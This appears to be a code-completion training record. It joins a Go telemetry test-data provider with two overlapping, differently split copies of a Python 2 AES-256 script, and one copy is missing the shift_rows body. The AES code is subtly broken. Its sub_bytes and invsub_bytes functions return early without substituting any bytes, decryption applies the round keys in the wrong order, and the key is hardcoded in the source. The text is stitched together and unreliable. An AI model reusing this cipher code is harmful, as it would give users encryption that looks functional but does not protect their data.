// The data to send is loaded from a file. The file should contain one JSON-encoded
// Export*ServiceRequest Protobuf message. The file can be recorded using the "file"
// exporter (note: "file" exporter writes one JSON message per line, FileDataProvider
// expects just a single JSON message in the entire file).
type FileDataProvider struct {
dataItemsGenerated *atomic.Uint64
logs plog.Logs
metrics pmetric.Metrics
traces ptrace.Traces
ItemsPerBatch int
}
// NewFileDataProvider creates an instance of FileDataProvider which generates test data
// loaded from a file.
func NewFileDataProvider(filePath string, dataType component.DataType) (*FileDataProvider, error) {
dp := &FileDataProvider{}
var err error
// Load the message from the file and count the data points.
switch dataType {
case component.DataTypeTraces:
if dp.traces, err = golden.ReadTraces(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.traces.SpanCount()
case component.DataTypeMetrics:
if dp.metrics, err = golden.ReadMetrics(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.metrics.DataPointCount()
case component.DataTypeLogs:
if dp.logs, err = golden.ReadLogs(filePath); err != nil {
return nil, err
}
dp.ItemsPerBatch = dp.logs.LogRecordCount()
}
return dp, nil
}
func (dp *FileDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
func (dp *FileDataProvider) GenerateTraces() (ptrace.Traces, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.traces, false
}
func (dp *FileDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.metrics, false
}
func (dp *FileDataProvider) GenerateLogs() (plog.Logs, bool) {
dp.dataItemsGenerated.Add(uint64(dp.ItemsPerBatch))
return dp.logs, false
} | random_line_split | |
AES.py | #! /usr/bin/env python
from BitVector import BitVector
RCON = [
0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,
0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,
0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a,
0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,
0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25,
0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,
0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08,
0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,
0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6,
0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,
0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61,
0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,
0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01,
0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,
0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e,
0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,
0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4,
0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,
0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8,
0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,
0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d,
0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,
0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91,
0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,
0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d,
0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,
0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c,
0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,
0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa,
0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,
0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66,
0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d]
SBOX = [
[0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76],
[0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0],
[0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15],
[0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75],
[0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84],
[0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf],
[0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8],
[0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2],
[0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73],
[0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb],
[0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79],
[0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08],
[0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a],
[0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e],
[0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf],
[0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
]
INVSBOX = [
[0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb],
[0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb],
[0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e],
[0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25],
[0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92],
[0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84],
[0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06],
[0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b],
[0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73],
[0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e],
[0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b],
[0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4],
[0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f],
[0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef],
[0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61],
[0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d]
]
plaintxt = "plaintext.txt"
encout = "encrypted.out"
enctxt = "encryptedtext.txt"
dectxt = "decryptedtext.txt"
default_key = "anunexaminedlifeisnotworthliving"
def encrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=plaintxt)
enctxtout = open(enctxt, "w")
fout = open(encout, "wb")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[0:4])
for i in xrange(1, 14):
sub_bytes(rstate)
shift_rows(rstate)
mix_cols(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
sub_bytes(rstate)
shift_rows(rstate)
add_round_key(rstate, keyschedule[56:60])
for i in xrange(0, 4):
for j in xrange(0, 4):
enctxtout.write(rstate[i][j].get_hex_string_from_bitvector())
rstate[i][j].write_to_file(fout)
| fout.close()
enctxtout.close()
def sub_word(word, sbox):
newword = ''
for i in xrange(0, 32, 8):
[row, col] = word[i:i+8].divide_into_two()
row = row.int_val()
col = col.int_val()
newword += str(BitVector(intVal=sbox[row][col]))
return BitVector(bitstring=newword)
def sub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=SBOX[row][col])
def shift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][i:4] + state[i][0:i]
def mix_cols(state):
mod = BitVector(bitstring='100011011')
bv2 = BitVector(hexstring='2')
bv3 = BitVector(hexstring='3')
for j in xrange(0, 4): # to select col
s0 = state[0][j]
s1 = state[1][j]
s2 = state[2][j]
s3 = state[3][j]
sp0 = bv2.gf_multiply_modular(s0, mod, 8) ^ bv3.gf_multiply_modular(s1, mod, 8) ^ s2 ^ s3
sp1 = s0 ^ bv2.gf_multiply_modular(s1, mod, 8) ^ bv3.gf_multiply_modular(s2, mod, 8) ^ s3
sp2 = s0 ^ s1 ^ bv2.gf_multiply_modular(s2, mod, 8) ^ bv3.gf_multiply_modular(s3, mod, 8)
sp3 = bv3.gf_multiply_modular(s0, mod, 8) ^ s1 ^ s2 ^ bv2.gf_multiply_modular(s3, mod, 8)
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def rot_word(word):
return word[8:32] + word[0:8]
def add_round_key(state, word):
for j in xrange(0, 4):
state[0][j] ^= word[j][0:8]
state[1][j] ^= word[j][8:16]
state[2][j] ^= word[j][16:24]
state[3][j] ^= word[j][24:32]
def key_expansion(key):
w = [0 for i in xrange(0, 64)]
for i in xrange(0, 8):
w[i] = BitVector(textstring=key[(i*4):(i*4+4)])
i = 8
while i < 60:
temp = w[i-1]
if (i % 8 == 0):
temp = sub_word((rot_word(temp)) ^ BitVector(intVal=RCON[i//8]), SBOX)
elif (i % 8 == 4):
temp = sub_word(temp, SBOX)
w[i] = w[i-8] ^ temp
i = i + 1
return w
def decrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=encout)
fout = open(dectxt, "w")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[56:60])
for i in xrange(1, 14):
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
invmix_cols(rstate)
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[0:4])
for i in xrange(0, 4):
for j in xrange(0, 4):
rstate[i][j].write_to_file(fout)
fout.close()
def invsub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=INVSBOX[row][col])
def invshift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][-i:] + state[i][:-i]
def invmix_cols(state):
mod = BitVector(bitstring='100011011')
brw0 = [BitVector(hexstring='0e'),
BitVector(hexstring='0b'),
BitVector(hexstring='0d'),
BitVector(hexstring='09')]
brw1 = [brw0[3]] + brw0[1:4]
brw2 = [brw1[3]] + brw1[1:4]
brw3 = [brw2[3]] + brw2[1:4]
for j in xrange(0, 4): # to select col
s =[state[0][j],
state[1][j],
state[2][j],
state[3][j]]
sp0 = reduce(lambda x, y: x^y, [brw0[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp1 = reduce(lambda x, y: x^y, [brw1[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp2 = reduce(lambda x, y: x^y, [brw2[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp3 = reduce(lambda x, y: x^y, [brw3[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def main():
#key = raw_input("Please enter the key (or empty to use default key):\n")
#if not key:
key = default_key
keyschedule = key_expansion(key)
encrypt(keyschedule)
decrypt(keyschedule)
if __name__ == "__main__":
main() | random_line_split | |
AES.py | #! /usr/bin/env python
from BitVector import BitVector
RCON = [
0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,
0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a,
0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a,
0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39,
0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25,
0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a,
0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08,
0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8,
0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6,
0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef,
0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61,
0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc,
0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01,
0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1b,
0x36, 0x6c, 0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e,
0xbc, 0x63, 0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3,
0x7d, 0xfa, 0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4,
0xd3, 0xbd, 0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94,
0x33, 0x66, 0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8,
0xcb, 0x8d, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20,
0x40, 0x80, 0x1b, 0x36, 0x6c, 0xd8, 0xab, 0x4d,
0x9a, 0x2f, 0x5e, 0xbc, 0x63, 0xc6, 0x97, 0x35,
0x6a, 0xd4, 0xb3, 0x7d, 0xfa, 0xef, 0xc5, 0x91,
0x39, 0x72, 0xe4, 0xd3, 0xbd, 0x61, 0xc2, 0x9f,
0x25, 0x4a, 0x94, 0x33, 0x66, 0xcc, 0x83, 0x1d,
0x3a, 0x74, 0xe8, 0xcb, 0x8d, 0x01, 0x02, 0x04,
0x08, 0x10, 0x20, 0x40, 0x80, 0x1b, 0x36, 0x6c,
0xd8, 0xab, 0x4d, 0x9a, 0x2f, 0x5e, 0xbc, 0x63,
0xc6, 0x97, 0x35, 0x6a, 0xd4, 0xb3, 0x7d, 0xfa,
0xef, 0xc5, 0x91, 0x39, 0x72, 0xe4, 0xd3, 0xbd,
0x61, 0xc2, 0x9f, 0x25, 0x4a, 0x94, 0x33, 0x66,
0xcc, 0x83, 0x1d, 0x3a, 0x74, 0xe8, 0xcb, 0x8d]
SBOX = [
[0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76],
[0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0],
[0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15],
[0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75],
[0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84],
[0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf],
[0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8],
[0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2],
[0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73],
[0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb],
[0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79],
[0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08],
[0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a],
[0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e],
[0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf],
[0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16]
]
INVSBOX = [
[0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb],
[0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb],
[0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e],
[0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25],
[0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92],
[0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84],
[0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a, 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06],
[0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02, 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b],
[0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73],
[0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e],
[0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b],
[0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4],
[0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f],
[0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef],
[0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61],
[0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d]
]
plaintxt = "plaintext.txt"
encout = "encrypted.out"
enctxt = "encryptedtext.txt"
dectxt = "decryptedtext.txt"
default_key = "anunexaminedlifeisnotworthliving"
def encrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=plaintxt)
enctxtout = open(enctxt, "w")
fout = open(encout, "wb")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[0:4])
for i in xrange(1, 14):
sub_bytes(rstate)
shift_rows(rstate)
mix_cols(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
sub_bytes(rstate)
shift_rows(rstate)
add_round_key(rstate, keyschedule[56:60])
for i in xrange(0, 4):
for j in xrange(0, 4):
enctxtout.write(rstate[i][j].get_hex_string_from_bitvector())
rstate[i][j].write_to_file(fout)
fout.close()
enctxtout.close()
def sub_word(word, sbox):
newword = ''
for i in xrange(0, 32, 8):
[row, col] = word[i:i+8].divide_into_two()
row = row.int_val()
col = col.int_val()
newword += str(BitVector(intVal=sbox[row][col]))
return BitVector(bitstring=newword)
def sub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=SBOX[row][col])
def shift_rows(state):
|
def mix_cols(state):
mod = BitVector(bitstring='100011011')
bv2 = BitVector(hexstring='2')
bv3 = BitVector(hexstring='3')
for j in xrange(0, 4): # to select col
s0 = state[0][j]
s1 = state[1][j]
s2 = state[2][j]
s3 = state[3][j]
sp0 = bv2.gf_multiply_modular(s0, mod, 8) ^ bv3.gf_multiply_modular(s1, mod, 8) ^ s2 ^ s3
sp1 = s0 ^ bv2.gf_multiply_modular(s1, mod, 8) ^ bv3.gf_multiply_modular(s2, mod, 8) ^ s3
sp2 = s0 ^ s1 ^ bv2.gf_multiply_modular(s2, mod, 8) ^ bv3.gf_multiply_modular(s3, mod, 8)
sp3 = bv3.gf_multiply_modular(s0, mod, 8) ^ s1 ^ s2 ^ bv2.gf_multiply_modular(s3, mod, 8)
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def rot_word(word):
return word[8:32] + word[0:8]
def add_round_key(state, word):
for j in xrange(0, 4):
state[0][j] ^= word[j][0:8]
state[1][j] ^= word[j][8:16]
state[2][j] ^= word[j][16:24]
state[3][j] ^= word[j][24:32]
def key_expansion(key):
w = [0 for i in xrange(0, 64)]
for i in xrange(0, 8):
w[i] = BitVector(textstring=key[(i*4):(i*4+4)])
i = 8
while i < 60:
temp = w[i-1]
if (i % 8 == 0):
temp = sub_word((rot_word(temp)) ^ BitVector(intVal=RCON[i//8]), SBOX)
elif (i % 8 == 4):
temp = sub_word(temp, SBOX)
w[i] = w[i-8] ^ temp
i = i + 1
return w
def decrypt(keyschedule):
# place to store state array
rstate = [[0 for i in xrange(0, 4)] for i in xrange(0, 4)]
bvfile = BitVector(filename=encout)
fout = open(dectxt, "w")
while (bvfile.more_to_read):
bit_block = bvfile.read_bits_from_file(128)
bit_block.pad_from_right(128 - len(bit_block))
# init state array
for i in xrange(0, 4):
for j in xrange(0, 4):
sp = (i * 32) + (j * 8)
rstate[j][i] = bit_block[sp:sp + 8]
add_round_key(rstate, keyschedule[56:60])
for i in xrange(1, 14):
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[i*4:((i+1)*4)])
invmix_cols(rstate)
invshift_rows(rstate)
invsub_bytes(rstate)
add_round_key(rstate, keyschedule[0:4])
for i in xrange(0, 4):
for j in xrange(0, 4):
rstate[i][j].write_to_file(fout)
fout.close()
def invsub_bytes(state):
for i in xrange(0, 4):
for j in xrange(0, 4):
[row, col] = state[i][j].divide_into_two()
row = row.int_val()
col = col.int_val()
return BitVector(intVal=INVSBOX[row][col])
def invshift_rows(state):
for i in xrange(1, 4): # to select row
state[i] = state[i][-i:] + state[i][:-i]
def invmix_cols(state):
mod = BitVector(bitstring='100011011')
brw0 = [BitVector(hexstring='0e'),
BitVector(hexstring='0b'),
BitVector(hexstring='0d'),
BitVector(hexstring='09')]
brw1 = [brw0[3]] + brw0[1:4]
brw2 = [brw1[3]] + brw1[1:4]
brw3 = [brw2[3]] + brw2[1:4]
for j in xrange(0, 4): # to select col
s =[state[0][j],
state[1][j],
state[2][j],
state[3][j]]
sp0 = reduce(lambda x, y: x^y, [brw0[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp1 = reduce(lambda x, y: x^y, [brw1[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp2 = reduce(lambda x, y: x^y, [brw2[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
sp3 = reduce(lambda x, y: x^y, [brw3[i].gf_multiply_modular(s[i], mod, 8) for i in xrange(0, 4)])
state[0][j] = sp0
state[1][j] = sp1
state[2][j] = sp2
state[3][j] = sp3
def main():
#key = raw_input("Please enter the key (or empty to use default key):\n")
#if not key:
key = default_key
keyschedule = key_expansion(key)
encrypt(keyschedule)
decrypt(keyschedule)
if __name__ == "__main__":
main()
